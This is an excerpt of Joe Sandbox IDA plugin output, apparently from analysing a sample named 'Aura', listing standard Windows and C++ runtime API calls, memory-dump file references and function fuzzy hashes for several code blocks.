                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000AF005
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(000A8E38), ref: 000AF024
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF052
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF0AD
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF0C4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 66001078-0
                                                                                                                                                                                                                                                    • Opcode ID: af26108f8c5b3d18a8763f6c4c26c4d37ec5e4d5e9590b942aacebc13679832f
                                                                                                                                                                                                                                                    • Instruction ID: 000f2ddbae669f30184dab5f8810313d430afc9d5b0eae69dab7afea35ab2c1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af26108f8c5b3d18a8763f6c4c26c4d37ec5e4d5e9590b942aacebc13679832f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D411671A0060BDBCB20DFE5C885DBAB3F5FF06311B204A3AE45697642DB35E985CB61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 000AD4C9
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000AD4D3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 000AD4EA
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 000AC1F6
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 000AC210
                                                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 000AD50D
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000AD544
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                                                                                                    • Opcode ID: 691e97bf17c896d67bfcc7c08340ca64211d3d50b519151ba92ea161ab7d4f19
                                                                                                                                                                                                                                                    • Instruction ID: 54c3ad681c965fee2f82dd1567682e110888dc45d20ac2340bd387a6ef7b7ef6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 691e97bf17c896d67bfcc7c08340ca64211d3d50b519151ba92ea161ab7d4f19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78018B71D005168FDB01EBE4C901EFEB7B5AF86324F15000AE816AB2D3CF389A00CB92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 000AADDE
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000AADE9
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000AAE57
                                                                                                                                                                                                                                                      • Part of subcall function 000AACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000AACC2
                                                                                                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 000AAE04
                                                                                                                                                                                                                                                    • _Yarn.LIBCPMT ref: 000AAE1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                                                                                                    • Opcode ID: b6cdf311eb6274297c9447969e0286f058f431b95d2b7ff0a203fbe75130e034
                                                                                                                                                                                                                                                    • Instruction ID: 4209b2447a6202b87c72fd8794c2d3dda22b26107daa83cfeec90f8cb025ad10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cdf311eb6274297c9447969e0286f058f431b95d2b7ff0a203fbe75130e034
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501B175A012219BEB05EBA0D8519BD77B5FF86750B04400AE801573C2CF385E42CFA2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: 9d0f66c5c13a2a67903469b1f010dc7567f990293f7a53819b632d838b715be5
                                                                                                                                                                                                                                                    • Instruction ID: be7e3b519abb51d15848899bf5d826e52b469a1aa1e5259308122c7283609bf7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d0f66c5c13a2a67903469b1f010dc7567f990293f7a53819b632d838b715be5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F15D75A012148FDB14CFA8C494BADBBF2FF89324F194269E815AB392D735AD05CF90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 004299CD
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00429A3F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: Wuv7$Wuv7
                                                                                                                                                                                                                                                    • API String ID: 237503144-1932794618
                                                                                                                                                                                                                                                    • Opcode ID: e25d58ab24c04b765f1a7a92fece9777d65b5727fe9848fec3fb11f69464d559
                                                                                                                                                                                                                                                    • Instruction ID: 1d21664b7f25e21536eec30c841bdffe79b404d1da9bba8fb3677da827e04efc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e25d58ab24c04b765f1a7a92fece9777d65b5727fe9848fec3fb11f69464d559
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0151DEB52483149FE3109F21EC81B5BBBF8FB8A704F10492DF6989B282D7759509CB96
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 000A7526
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A7561
                                                                                                                                                                                                                                                      • Part of subcall function 000AAF37: CreateThreadpoolWork.KERNEL32(000AB060,000A8A2A,00000000), ref: 000AAF46
                                                                                                                                                                                                                                                      • Part of subcall function 000AAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 000AAF53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: Fail to schedule the chore!$G.
                                                                                                                                                                                                                                                    • API String ID: 3683891980-2786361616
                                                                                                                                                                                                                                                    • Opcode ID: 39d47c348ad3eb977c54c81626e3e3f8fea7b57981d85fd93f4c46c67910483e
                                                                                                                                                                                                                                                    • Instruction ID: bf639ead6aa740d980b06e4bb4622d1de71edb97a0bcf440b9aee16dedd2bec3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39d47c348ad3eb977c54c81626e3e3f8fea7b57981d85fd93f4c46c67910483e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04519EB0D012089FCB14DF94DC44BAEBBB4FF09314F14812AE8196B391E7799905CFA1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: @$V0/.
                                                                                                                                                                                                                                                    • API String ID: 0-2384241223
                                                                                                                                                                                                                                                    • Opcode ID: bba1772812f9aaafa8ad49a2991545f6bf9fcf15dc7ef7d0645953405adfe873
                                                                                                                                                                                                                                                    • Instruction ID: fd479f24e7454a86608881c10ac1fb51ac8f6e5b5ecef8113ba61f705af730f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba1772812f9aaafa8ad49a2991545f6bf9fcf15dc7ef7d0645953405adfe873
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37411876608341DBD3109F25DC91BAB77E9AFD6311F098A3EE5D8C7281DA388D448726
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3EC6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A4002
                                                                                                                                                                                                                                                      • Part of subcall function 000AABC5: _Yarn.LIBCPMT ref: 000AABE5
                                                                                                                                                                                                                                                      • Part of subcall function 000AABC5: _Yarn.LIBCPMT ref: 000AAC09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name$|=e.
                                                                                                                                                                                                                                                    • API String ID: 2070049627-889109421
                                                                                                                                                                                                                                                    • Opcode ID: b9f3036555da22a5f767d30f409e1d5cc72634278b3a1dfeebc6d1e4e2588f61
                                                                                                                                                                                                                                                    • Instruction ID: 0e1b08839cbdceb16304edd4e14f10eb546439d77692820740470beb04badd4d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9f3036555da22a5f767d30f409e1d5cc72634278b3a1dfeebc6d1e4e2588f61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE415CF0E007459BEB10DF69C805B97BAF8BF05714F044628E5499B781E77AE518CBE2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000AB809
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: bd001702a50e86c7a0a7331e7aaed4097b79120fb0558fd783fd1bf038654a0c
                                                                                                                                                                                                                                                    • Instruction ID: 4ce2f4e63de3be40e91e05ea6ff0d1fae27d69fff04af16f1e4718b518612458
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd001702a50e86c7a0a7331e7aaed4097b79120fb0558fd783fd1bf038654a0c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4221CF358042059FDB249FE8C856AAEB7ECEF42720F14451EE41187693DB78AA41CA81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,000A253A,?,?,00000000), ref: 000AF129
                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,000A253A,?,?,00000000), ref: 000AF142
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,000A253A,?,?,00000000), ref: 000AF154
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID: :%
                                                                                                                                                                                                                                                    • API String ID: 2551024706-3734732973
                                                                                                                                                                                                                                                    • Opcode ID: e902795b20570790acc577d7d92016794a76dfa951f200ee5abc35cd644fcafb
                                                                                                                                                                                                                                                    • Instruction ID: 214d5edd43eab8caa10170653656c0fd26f790e5b88f4260907e214bbefca695
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e902795b20570790acc577d7d92016794a76dfa951f200ee5abc35cd644fcafb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F08231655115EFEF508FA4DC05ABA3BA4EB02770F640321FC21EA1E0E735EE408690
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarn
                                                                                                                                                                                                                                                    • String ID: e.$|=e.
                                                                                                                                                                                                                                                    • API String ID: 1767336200-1338432414
                                                                                                                                                                                                                                                    • Opcode ID: 6f6eb047cc6784a691706be6792174063844891b047b8ad7013dadebdb3f659a
                                                                                                                                                                                                                                                    • Instruction ID: 59a1476ce851f2f25e90512a67f00d2d72d0353d3ee38597134ef4e8fa53859c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f6eb047cc6784a691706be6792174063844891b047b8ad7013dadebdb3f659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6E0E5223583046FF71C7A65EC52BF677DCDB45761F10042EFA1A8A6C3EE10ED0485A5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,000C69DC,00000000,?,000DD2B0,?,?,?,000C6913,00000004,InitializeCriticalSectionEx,000D0D34,000D0D3C), ref: 000C694D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,000C69DC,00000000,?,000DD2B0,?,?,?,000C6913,00000004,InitializeCriticalSectionEx,000D0D34,000D0D3C,00000000,?,000BBBBC), ref: 000C6957
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 000C697F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: d69492d3fa4028c29adf69a2f2851aad87a349f51ee7b20020cfcef2937d0b38
                                                                                                                                                                                                                                                    • Instruction ID: 241fbba52ffe8b751972fdb1cec98cef0647c8f73d1c2071afe3e73febac1a35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69492d3fa4028c29adf69a2f2851aad87a349f51ee7b20020cfcef2937d0b38
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBE01A30780304BBEF201B60EC06F6D3B99EB45B91F240425FA4CAC4E1DB77EC509954
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 000C4001
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C4253
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000C4299
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C433C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: 614a027a67b4d8c7b99e8a93ab13915f42d8bdfe41f51b86e876b156072665aa
                                                                                                                                                                                                                                                    • Instruction ID: f582280c6309351ebf47e7ceb04595ce1b61af8a06d7524fb373b179cb4f5e96
